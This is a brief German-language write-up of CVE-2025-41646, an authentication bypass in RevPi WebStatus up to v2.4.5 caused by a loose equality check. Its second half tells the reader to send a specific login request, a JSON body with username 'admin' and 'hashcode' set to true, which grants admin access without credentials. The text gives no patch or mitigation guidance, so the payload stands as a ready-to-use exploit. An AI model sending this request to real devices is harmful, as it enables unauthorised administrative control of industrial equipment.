
CVE-2025-41646 - Kritische Authentifizierungsumgehung
CVE-2025-41646 - Kritische Authentifizierungsumgehung
Eine kritische Sicherheitslücke zur Authentifizierungsumgehung (CVE-2025-41646) in RevPi WebStatus ≤ v2.4.5 ermöglicht es einem Angreifer, sich als admin ohne gültige Anmeldedaten anzumelden, aufgrund schwacher Typvergleichslogik (== vs ===).
Senden Sie eine Anmeldeanfrage mit:
{
"mode": "LOGIN",
"username": "admin",
"hashcode": true
}